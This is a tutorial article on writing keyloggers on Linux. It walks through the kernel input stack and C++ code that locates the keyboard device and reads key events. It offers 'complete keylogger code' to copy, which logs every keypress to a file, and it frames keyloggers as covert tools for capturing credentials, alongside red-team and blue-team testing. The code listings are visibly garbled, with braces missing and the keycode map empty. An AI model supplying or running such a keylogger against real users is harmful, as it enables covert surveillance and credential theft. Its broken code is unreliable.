34.Key AbstractDigital Esm W900

This first part of the Complete Guide to Keylogging in Linux will explore keylogger attacks in network security. Keylogging can be valuable for testing within the Linux Security realm, so we will dive deeper into how you can write keyloggers and read events directly from a keyboard device on Linux.

What is a Keylogger Attack?

Keyloggers refer to a computer program where you can covertly monitor keyboard inputs to ensure that users are unaware of the activity you log. This program oversees lower-level keyboard events (key up or down), and you can run the software anywhere from the Linux kernel space to the userspace, depending on the design. This network security toolkit pays attention to what keys a user hits on the keyboard, which can help cybercriminals determine login credentials, account information, and other information.

What is the Purpose of a Keylogger?

Business Cybersecurity Esm W400IT security teams can use keyloggers during cloud security audit exercises (a "red team" test) to determine what needs security patching on your server. They can also figure out where cloud security breaches might try to compromise your system, infiltrate infrastructure, and capture valuable data so they can take care of those gaps before it is too late. They can record account credentials and network information to determine how to combat these risks.

Both offensive security teams, or red teams, and defensive security teams, or blue teams, can benefit from keyloggers. Red teams can learn multiple ways to implement keyloggers and understand where keyloggers can run within a server, whether through userspace, the hypervisor, or Linux kernels. Blue teams can learn where keyloggers hide, and the standard APIs and methods employees must monitor to detect keyloggers.

What is the Main Function of a Keylogger on Linux Keyboards?

Here is a basic overview of how a keyboard fits in a larger scheme:

        /-----------+-----------\   /-----------+-----------\
        |   app 1   |    app 2  |   |   app 3   |    app 4  |
        \-----------+-----------/   \-----------+-----------/
                    ^                           ^
                    |                           |
            +-------+                           |
            |                                   |
            | key symbol              keycode   |
            | + modifiers                       |
            |                                   |
            |                                   |
        +---+-------------+         +-----------+-------------+
        +     X server    |         |    /dev/input/eventX    |
        +-----------------+         +-------------------------+
                ^                               ^
                |      keycode / scancode       |
                +---------------+--------------+      interrupt
                |           kernel             | <--------=-------+
                +------------------------------+                  |
    +----------+     USB, PS/2      +-------------+ PCI, ...   +-----+
    | keyboard |------------------->| motherboard |----------->| CPU |
    +----------+    key up/down     +-------------+            +-----+

In this example, a keyboard does not pass the ASCII code of pressed keys. Instead, it passes a unique byte per key-down and key-up event, known as the key or scan code. When the key is released, it passes through the scan code to the motherboard or connected interface, which will see if an event takes place, which it can convert to an interrupt and move to the CPU. When the CPU sees the interrupt, it will launch an interrupt handler, a keylogger code from the Linux kernel that registers by populating the Interrupt Descriptor Table. This interrupt handler passes information to the kernel, exposing the special path in devtmpfs (/dev/input/eventX).

In a GUI-based system, the X server takes these scan codes from the kernel and transforms them into key symbols and metadata. With this layering, the Linux kernel can ensure the locale and keyboard map settings are applied correctly, which can also be done without the X server. All GUI applications receive events from the X server and then retrieve processed data.

You can write keyloggers in two different ways. Find the keyboard device /dev/input/eventX file and read it directly, or ask the X server to pass the event data to us.

How Can I Find the Keyboard Device?

Identifying the keyboard device is a relatively straightforward process:

  • Iterate the “/dev/input/” across all files.
  • Check the given file is a character device.
  • Ensure the file supports key events and has keys found on keyboards.

Then, you can oversee a system with multiple keyboards and determine which devices are pretending to be one (such as barcode scanners). This check can help you figure out what keys are supported. After, read through and process the recorded data later to filter out unwanted devices. Then, you can iterate over the directory and find the character files with C++17, as seen here:

std::string get_kb_device()
    std::string kb_device = "";

    for (auto &p : std::filesystem::directory_iterator("/dev/input/"))
        std::filesystem::file_status status = std::filesystem::status(p);

        if (std::filesystem::is_character_file(status))
            kb_device = p.path().string();
    return kb_device;

Check that the file is a keyboard and supports actual keys. However, this can be more involved, so observe the scheme here:

std::string filename = p.path().string();
int fd = open(filename.c_str(), O_RDONLY);
if(fd == -1)
    std::cerr << "Error: " << strerror(errno) << std::endl;

int32_t event_bitmap = 0;
int32_t kbd_bitmap = KEY_A | KEY_B | KEY_C | KEY_Z;

ioctl(fd, EVIOCGBIT(0, sizeof(event_bitmap)), &event_bitmap);
if((EV_KEY & event_bitmap) == EV_KEY)
    ioctl(fd, EVIOCGBIT(EV_KEY, sizeof(event_bitmap)), &event_bitmap);
    if((kbd_bitmap & event_bitmap) == kbd_bitmap)
        // The device supports A, B, C, Z keys, so it probably is a keyboard
        kb_device = filename;


How Can I Read Keyboard Events?

Here is how to read the events, which is a relatively straightforward process:

  • Read the “input_event” from the keyboard device.
  • Check that the event type is an EV_KEY, or key event.
  • Interpret the fields and extract scan codes.
  • Map scan codes to the name of the key.

Here is how to define the “input_event”:

struct input_event {
#if (__BITS_PER_LONG != 32 || !defined(__USE_TIME_BITS64)) && !defined(__KERNEL__)
	struct timeval time;
#define input_event_sec time.tv_sec
#define input_event_usec time.tv_usec
	__kernel_ulong_t __sec;
#if defined(__sparc__) && defined(__arch64__)
	unsigned int __usec;
	unsigned int __pad;
	__kernel_ulong_t __usec;
#define input_event_sec  __sec
#define input_event_usec __usec
	__u16 type;
	__u16 code;
	__s32 value;

This is the terminology we must understand for the above example:

  • “time” is the timestamp that informs you of the time the event occurred.
  • “Type” defines the event based on the /usr/include/linux/input-event-codes.h.
  • Key events will be under “**EV_KEY**”
  • “Code” refers to the event code you find /usr/include/linux/input-event-codes.h. Key events will be scan codes.
  • "Value" refers to the value of the carried event. This can be either a relative change for EV_REL, an absolute new value for EV_ABS (joysticks, etc.), or 0 for EV_KEY for release, 1 for keypress and 2 for autorepeat.

Use the following map to run key name scan codes in a basic format:

std::vector keycodes = {

Here is the complete keylogger code for you to copy if needed:





std::vector keycodes = {

int loop = 1;

void sigint_handler(int sig)
    loop = 0;

int write_all(int file_desc, const char *str)
    int bytesWritten = 0;
    int bytesToWrite = strlen(str);

        bytesWritten = write(file_desc, str, bytesToWrite);

        if(bytesWritten == -1)
            return 0;
        bytesToWrite -= bytesWritten;
        str += bytesWritten;
    } while(bytesToWrite > 0);

    return 1;

void safe_write_all(int file_desc, const char *str, int keyboard)
    struct sigaction new_actn, old_actn;
    new_actn.sa_handler = SIG_IGN;
    new_actn.sa_flags = 0;

    sigaction(SIGPIPE, &new_actn, &old_actn);

    if(!write_all(file_desc, str))
        std::cerr << "Error: " << strerror(errno) << std::endl;

    sigaction(SIGPIPE, &old_actn, NULL);

void keylogger(int keyboard, int writeout)
    int eventSize = sizeof(struct input_event);
    int bytesRead = 0;
    const unsigned int number_of_events = 128;
    struct input_event events[number_of_events];
    int i;

    signal(SIGINT, sigint_handler);

        bytesRead = read(keyboard, events, eventSize * number_of_events);

        for(i = 0; i < (bytesRead / eventSize); ++i)
            if(events[i].type == EV_KEY)
                if(events[i].value == 1)
                    if(events[i].code > 0 && events[i].code < keycodes.size())
                        safe_write_all(writeout, keycodes[events[i].code].c_str(), keyboard);
                        safe_write_all(writeout, "\n", keyboard);
                        write(writeout, "UNRECOGNIZED", sizeof("UNRECOGNIZED"));
    if(bytesRead > 0) safe_write_all(writeout, "\n", keyboard);

std::string get_kb_device()
    std::string kb_device = "";

    for (auto &p : std::filesystem::directory_iterator("/dev/input/"))
        std::filesystem::file_status status = std::filesystem::status(p);

        if (std::filesystem::is_character_file(status))
            std::string filename = p.path().string();
            int fd = open(filename.c_str(), O_RDONLY);
            if(fd == -1)
                std::cerr << "Error: " << strerror(errno) << std::endl;

            int32_t event_bitmap = 0;
            int32_t kbd_bitmap = KEY_A | KEY_B | KEY_C | KEY_Z;

            ioctl(fd, EVIOCGBIT(0, sizeof(event_bitmap)), &event_bitmap);
            if((EV_KEY & event_bitmap) == EV_KEY)
                // The device acts like a keyboard

                ioctl(fd, EVIOCGBIT(EV_KEY, sizeof(event_bitmap)), &event_bitmap);
                if((kbd_bitmap & event_bitmap) == kbd_bitmap)
                    // The device supports A, B, C, Z keys, so it probably is a keyboard
                    kb_device = filename;
    return kb_device;

void print_usage_and_quit(char *application_name)
    std::cout << "Usage: " << application_name << " output-file" << std::endl;

int main(int argc, char *argv[])
    std::string kb_device = get_kb_device();

    if (argc < 2)

    if(kb_device == "")

    int writeout;
    int keyboard;

    if((writeout = open(argv[1], O_WRONLY|O_APPEND|O_CREAT, S_IROTH)) < 0)
        std::cerr << "Error opening file " << argv[1] << ": " << strerror(errno) << std::endl;
        return 1;

    if((keyboard = open(kb_device.c_str(), O_RDONLY)) < 0)
        std::cerr << "Error accessing keyboard from " << kb_device << ". May require you to be superuser." << std::endl;
        return 1;

    std::cout << "Keyboard device: " << kb_device << std::endl;
    keylogger(keyboard, writeout);


    return 0;


Final Thoughts on Linux Keylogger Attacks

Exercise proper data and network security by implementing proper key press and release entries that handle backspaces and patch cybersecurity vulnerabilities. These network security toolkits can help improve security posture and allow users the peace of mind that they will not face keylogger cloud security breaches.